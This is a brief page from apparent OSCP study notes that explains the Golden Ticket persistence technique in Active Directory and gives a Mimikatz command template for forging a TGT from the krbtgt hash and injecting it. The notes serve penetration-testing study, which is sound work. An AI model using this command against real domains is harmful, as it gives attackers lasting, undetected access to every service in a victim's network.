> For the complete documentation index, see [llms.txt](https://dudisamarel.gitbook.io/oscp-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://dudisamarel.gitbook.io/oscp-notes/windows/persistence/golden-ticket.md).

# Golden Ticket

A **Golden Ticket** is an TGT (Ticket Granting Ticket) crafted with the domain's **krbtgt** account hash, which is used to cryptographically sign all TGTs in the AD domain. Therefore, with the Golden Ticket an attacker is able to request any service ticket. \
This technique enables long-term access by effectively bypassing typical authentication mechanisms.

The following example shows forging ticket a Golden Ticket using Mimikatz

{% code overflow="wrap" %}

```
privilege::debug                 
kerberos::golden /user:<username> /domain:<domain_name> /sid:<domain_sid> /krbtgt:<krbtgt_hash> /id:<rid> /ptt
```

{% endcode %}
